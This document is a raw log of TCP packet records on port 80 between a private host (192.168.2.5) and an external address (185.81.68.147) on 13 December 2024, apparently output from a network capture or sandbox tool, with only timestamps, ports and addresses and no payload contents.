                                                                                                                                                                Dec 13, 2024 01:37:15.113651037 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.113779068 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.113830090 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.114567041 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.114691019 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.114738941 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.115468979 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.115576029 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.115627050 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.116393089 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.116416931 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.116759062 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.117315054 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.117434978 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.117628098 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.118207932 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.118329048 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.118382931 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.119096041 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.119229078 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.119277000 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.120031118 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.120141983 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.120197058 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.120950937 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.121022940 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.121074915 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.121870995 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.122070074 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.122117043 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.122770071 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.122911930 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.122957945 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.123724937 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.123809099 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.123929024 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.124603987 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.124736071 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.124838114 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.125514030 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.125622988 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.125672102 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.126410007 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.126477957 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.127063036 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.127358913 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.127451897 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.127505064 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.128290892 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.128340960 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.128478050 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.129156113 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.129237890 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.129390001 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.130042076 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.130151987 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.130521059 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.130964994 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.131056070 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.131109953 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.131865025 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.131980896 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.132067919 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.132771015 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.132914066 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.133028030 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.133655071 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.133780003 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.133831024 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.134579897 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.134690046 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.135163069 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.135492086 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.135608912 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.135663033 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.136409998 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.136521101 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.136745930 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.137320995 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.137432098 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.138231993 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.138287067 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.138324976 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.138370037 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.139139891 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.139235020 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.140043020 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.140099049 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.140145063 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.140187025 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.140957117 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.141066074 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.141122103 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.141855001 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.141987085 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.142765045 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.142828941 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.142870903 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.142913103 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.143693924 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.143743038 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.144593954 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.144649982 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.144694090 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.144747972 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.145518064 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.145623922 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.145680904 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.146406889 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.146518946 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.146573067 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.147273064 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.192199945 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.291682959 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.291805983 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.291861057 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.292068005 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.292207003 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.292257071 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.292989969 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.293065071 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.293122053 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.293885946 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.293998957 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.294085979 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.294787884 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.294899940 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.294951916 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.295690060 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.295820951 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.295874119 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.296617985 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.296706915 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.296757936 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.297539949 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.297677040 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.297729015 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.298439980 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.298558950 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.298624039 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.299371958 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.299455881 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.299513102 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.300260067 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.300385952 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.300431967 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.301188946 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.301311016 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.301359892 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.302107096 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.302215099 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.302297115 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.302983046 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.303093910 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.303147078 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.304094076 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.304234028 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.304285049 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.304790020 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.304918051 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.304966927 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.305699110 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.305818081 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.305869102 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.306618929 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.306732893 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.306782961 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.307543039 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.307663918 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.307713985 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.308434963 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.308520079 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.308568954 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.309345007 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.309436083 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.309526920 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.310247898 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.310379982 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.310431004 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.311177969 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.311461926 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.311525106 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.312062979 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.312114000 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.312161922 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.312994957 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.313126087 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.313266039 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.313914061 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.314033985 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.314099073 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.314806938 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.314918041 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.314970016 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.315718889 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.315861940 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.315911055 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.316698074 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.316801071 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.316864967 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.317545891 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.317668915 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.317719936 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.318439007 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.318566084 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.318613052 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.319377899 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.319456100 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.319503069 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.320250034 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.320373058 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.320430040 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.321186066 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.321301937 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.321365118 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.322065115 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.322194099 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.322269917 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.322977066 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.323090076 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.323137045 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.323906898 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.324022055 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.324070930 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.324795008 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.324912071 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.324959993 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.325717926 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.325834990 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.325886965 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.326621056 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.326742887 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.326795101 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.327532053 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.327697039 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.327872038 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.328435898 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.328542948 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.328588963 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.329360962 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.329480886 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.329530001 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.330257893 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.330404043 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.330502033 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.331178904 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.331341982 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.331389904 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.332083941 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.332195044 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.332243919 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.332997084 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.333092928 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.333412886 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.333904982 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.334017038 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.334062099 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.334809065 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.334928989 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.334980965 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.335757017 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.335822105 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.335872889 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.336611986 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.336757898 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.336828947 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.337532997 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.337709904 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.337759018 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.338440895 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.338593006 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.338653088 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.339330912 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.379663944 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.483530045 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.483591080 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.483928919 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.483983040 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.483992100 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.484035015 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.484848022 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.484903097 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.484961033 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.485780954 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.485904932 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.486120939 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.486653090 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.486771107 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.486829042 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.487549067 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.487603903 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.487658024 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.488488913 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.488626003 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.488677979 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.489407063 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.489500046 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.489552975 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.490294933 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.490416050 CET8049707185.81.68.147192.168.2.5
